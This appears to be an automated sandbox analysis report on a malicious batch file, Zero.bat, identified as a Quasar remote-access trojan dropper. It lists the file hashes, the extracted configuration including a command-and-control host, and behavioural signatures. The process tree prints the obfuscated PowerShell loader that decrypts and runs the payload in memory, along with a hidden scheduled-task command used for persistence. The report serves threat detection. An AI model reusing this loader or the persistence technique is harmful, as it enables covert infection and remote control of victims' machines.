Analysis
-
max time kernel
94s -
max time network
100s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-06-2024 12:24
Static task
static1
General
-
Target
Zero.bat
-
Size
586KB
-
MD5
2ff26433125b6ce77afd2a59f74bae89
-
SHA1
2f5847389b977507d179ecd60cbc8590da60c5d0
-
SHA256
9dbfff66782d04d283175444524dd531827b9e44e606ffcf5c14093f01aceb0b
-
SHA512
b3764ca03df52012050b616c89d874909c0784eeb01c3013b7c6cd4c7b3c34372089de2f8942055144b5c08b830506d615d7210abf1e60beef23fe161505910d
-
SSDEEP
12288:Q2x918cuchSBt6dbzm7xEbT0Jjd6Gxnw6LfDK4KbMC/I7dllU5ky:QW8B6CE/0JR6GGGuwZ765b
Malware Config
Extracted
quasar
1.3.0.0
Slave
runderscore00-61208.portmap.host:61208
QSR_MUTEX_cq1PvE2FSZsrtLytho
-
encryption_key
KqyNe9NPfFv7dzIbQXP4
-
install_name
$phantom-powershell.exe
-
log_directory
$phantom-Logs
-
reconnect_delay
3000
-
startup_key
Powershell
-
subdirectory
$phantom-zero
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2796-143-0x000002317B890000-0x000002317B8EE000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 2796 powershell.exe 3 2796 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 3284 powershell.exe 1632 powershell.exe 2796 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3284 powershell.exe 3284 powershell.exe 1632 powershell.exe 1632 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3284 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeIncreaseQuotaPrivilege 1632 powershell.exe Token: SeSecurityPrivilege 1632 powershell.exe Token: SeTakeOwnershipPrivilege 1632 powershell.exe Token: SeLoadDriverPrivilege 1632 powershell.exe Token: SeSystemProfilePrivilege 1632 powershell.exe Token: SeSystemtimePrivilege 1632 powershell.exe Token: SeProfSingleProcessPrivilege 1632 powershell.exe Token: SeIncBasePriorityPrivilege 1632 powershell.exe Token: SeCreatePagefilePrivilege 1632 powershell.exe Token: SeBackupPrivilege 1632 powershell.exe Token: SeRestorePrivilege 1632 powershell.exe Token: SeShutdownPrivilege 1632 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeSystemEnvironmentPrivilege 1632 powershell.exe Token: SeRemoteShutdownPrivilege 1632 powershell.exe Token: SeUndockPrivilege 1632 powershell.exe Token: SeManageVolumePrivilege 1632 powershell.exe Token: 33 1632 powershell.exe Token: 34 1632 powershell.exe Token: 35 1632 powershell.exe Token: 36 1632 powershell.exe Token: SeIncreaseQuotaPrivilege 1632 powershell.exe Token: SeSecurityPrivilege 1632 powershell.exe Token: SeTakeOwnershipPrivilege 1632 powershell.exe Token: SeLoadDriverPrivilege 1632 powershell.exe Token: SeSystemProfilePrivilege 1632 powershell.exe Token: SeSystemtimePrivilege 1632 powershell.exe Token: SeProfSingleProcessPrivilege 1632 powershell.exe Token: SeIncBasePriorityPrivilege 1632 powershell.exe Token: SeCreatePagefilePrivilege 1632 powershell.exe Token: SeBackupPrivilege 1632 powershell.exe Token: SeRestorePrivilege 1632 powershell.exe Token: SeShutdownPrivilege 1632 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeSystemEnvironmentPrivilege 1632 powershell.exe Token: SeRemoteShutdownPrivilege 1632 powershell.exe Token: SeUndockPrivilege 1632 powershell.exe Token: SeManageVolumePrivilege 1632 powershell.exe Token: 33 1632 powershell.exe Token: 34 1632 powershell.exe Token: 35 1632 powershell.exe Token: 36 1632 powershell.exe Token: SeIncreaseQuotaPrivilege 1632 powershell.exe Token: SeSecurityPrivilege 1632 powershell.exe Token: SeTakeOwnershipPrivilege 1632 powershell.exe Token: SeLoadDriverPrivilege 1632 powershell.exe Token: SeSystemProfilePrivilege 1632 powershell.exe Token: SeSystemtimePrivilege 1632 powershell.exe Token: SeProfSingleProcessPrivilege 1632 powershell.exe Token: SeIncBasePriorityPrivilege 1632 powershell.exe Token: SeCreatePagefilePrivilege 1632 powershell.exe Token: SeBackupPrivilege 1632 powershell.exe Token: SeRestorePrivilege 1632 powershell.exe Token: SeShutdownPrivilege 1632 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeSystemEnvironmentPrivilege 1632 powershell.exe Token: SeRemoteShutdownPrivilege 1632 powershell.exe Token: SeUndockPrivilege 1632 powershell.exe Token: SeManageVolumePrivilege 1632 powershell.exe Token: 33 1632 powershell.exe Token: 34 1632 powershell.exe Token: 35 1632 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2796 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 1644 wrote to memory of 4472 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 4472 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 3284 1644 cmd.exe powershell.exe PID 1644 wrote to memory of 3284 1644 cmd.exe powershell.exe PID 3284 wrote to memory of 1632 3284 powershell.exe powershell.exe PID 3284 wrote to memory of 1632 3284 powershell.exe powershell.exe PID 3284 wrote to memory of 4196 3284 powershell.exe WScript.exe PID 3284 wrote to memory of 4196 3284 powershell.exe WScript.exe PID 4196 wrote to memory of 1088 4196 WScript.exe cmd.exe PID 4196 wrote to memory of 1088 4196 WScript.exe cmd.exe PID 1088 wrote to memory of 1944 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 1944 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 2796 1088 cmd.exe powershell.exe PID 1088 wrote to memory of 2796 1088 cmd.exe powershell.exe PID 2796 wrote to memory of 3300 2796 powershell.exe Explorer.EXE PID 2796 wrote to memory of 1324 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2164 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 3144 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1420 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2448 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 4904 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1368 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 944 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1140 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 3700 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1920 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 4560 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1128 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 536 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1516 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2500 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1708 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1900 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1496 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1096 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 3452 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1284 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1080 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2648 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1660 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 3432 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 4020 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1848 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2632 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1248 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1048 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 4392 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1040 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2216 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2576 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2600 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2364 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 824 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1804 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1796 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1204 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 612 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1000 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1984 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 2372 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1972 2796 powershell.exe svchost.exe PID 2796 wrote to memory of 1380 2796 powershell.exe svchost.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Zero.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yZYTRWMfUpdQsWzRNhgq0mFws977A+StI70yBGRnC+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5XRuWb4gaWV6nxs5P7YgjQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DjILw=New-Object System.IO.MemoryStream(,$param_var); $TZbgX=New-Object System.IO.MemoryStream; $QZNNR=New-Object System.IO.Compression.GZipStream($DjILw, [IO.Compression.CompressionMode]::Decompress); $QZNNR.CopyTo($TZbgX); $QZNNR.Dispose(); $DjILw.Dispose(); $TZbgX.Dispose(); $TZbgX.ToArray();}function execute_function($param_var,$param2_var){ $CndPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xOdXP=$CndPg.EntryPoint; $xOdXP.Invoke($null, $param2_var);}$KZmTg = 'C:\Users\Admin\AppData\Local\Temp\Zero.bat';$host.UI.RawUI.WindowTitle = $KZmTg;$KKBtf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($KZmTg).Split([Environment]::NewLine);foreach ($MaKkc in $KKBtf) { if ($MaKkc.StartsWith('XIDLpYhyhveyinwDjrVI')) { $jLMlC=$MaKkc.Substring(20); break; }}$payloads_var=[string[]]$jLMlC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_784_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yZYTRWMfUpdQsWzRNhgq0mFws977A+StI70yBGRnC+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5XRuWb4gaWV6nxs5P7YgjQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DjILw=New-Object System.IO.MemoryStream(,$param_var); $TZbgX=New-Object System.IO.MemoryStream; $QZNNR=New-Object System.IO.Compression.GZipStream($DjILw, [IO.Compression.CompressionMode]::Decompress); $QZNNR.CopyTo($TZbgX); $QZNNR.Dispose(); $DjILw.Dispose(); $TZbgX.Dispose(); $TZbgX.ToArray();}function execute_function($param_var,$param2_var){ $CndPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xOdXP=$CndPg.EntryPoint; $xOdXP.Invoke($null, $param2_var);}$KZmTg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.bat';$host.UI.RawUI.WindowTitle = $KZmTg;$KKBtf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($KZmTg).Split([Environment]::NewLine);foreach ($MaKkc in $KKBtf) { if ($MaKkc.StartsWith('XIDLpYhyhveyinwDjrVI')) { $jLMlC=$MaKkc.Substring(20); break; }}$payloads_var=[string[]]$jLMlC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ss5mxmuc.5ti.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.batFilesize
586KB
MD52ff26433125b6ce77afd2a59f74bae89
SHA12f5847389b977507d179ecd60cbc8590da60c5d0
SHA2569dbfff66782d04d283175444524dd531827b9e44e606ffcf5c14093f01aceb0b
SHA512b3764ca03df52012050b616c89d874909c0784eeb01c3013b7c6cd4c7b3c34372089de2f8942055144b5c08b830506d615d7210abf1e60beef23fe161505910d
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_784.vbsFilesize
124B
MD5a020ab46f721b2eada27ae3765ec417e
SHA1ff18ae7087576d40a9c4d0551d7d71ee5d58d81c
SHA2569074fef96fd6cc69bf68ee2dd64b5f303f26e8c687a4c5cc2f016ecbceab0824
SHA512e8b02674c0cfcb0ef9ce64b4d7cd6d6a3c4949b3c0a47d7b4e8d702c4889dae0f43b832b7a6f45204d318a250d51b6fa9efb679c542f3f2c78529fc2bdfaa062
-
memory/612-110-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1080-98-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1140-102-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1324-95-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1368-106-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1420-101-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1516-103-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1632-30-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/1632-27-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/1632-26-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/1632-25-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/1796-108-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1804-109-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/1920-105-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/2164-99-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/2448-100-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/2796-143-0x000002317B890000-0x000002317B8EE000-memory.dmpFilesize
376KB
-
memory/2796-146-0x000002317BD70000-0x000002317BDAC000-memory.dmpFilesize
240KB
-
memory/2796-145-0x000002317BD10000-0x000002317BD22000-memory.dmpFilesize
72KB
-
memory/3144-96-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/3284-10-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/3284-14-0x000001AAA07F0000-0x000001AAA07F8000-memory.dmpFilesize
32KB
-
memory/3284-0-0x00007FFA7DA33000-0x00007FFA7DA35000-memory.dmpFilesize
8KB
-
memory/3284-13-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/3284-12-0x000001AAA0840000-0x000001AAA0886000-memory.dmpFilesize
280KB
-
memory/3284-11-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/3284-9-0x000001AA88740000-0x000001AA88762000-memory.dmpFilesize
136KB
-
memory/3284-15-0x000001AAA0AF0000-0x000001AAA0B60000-memory.dmpFilesize
448KB
-
memory/3284-144-0x00007FFA7DA30000-0x00007FFA7E4F2000-memory.dmpFilesize
10.8MB
-
memory/3300-97-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/3300-47-0x0000000005A40000-0x0000000005A6A000-memory.dmpFilesize
168KB
-
memory/4392-107-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB
-
memory/4560-104-0x00007FFA5E9B0000-0x00007FFA5E9C0000-memory.dmpFilesize
64KB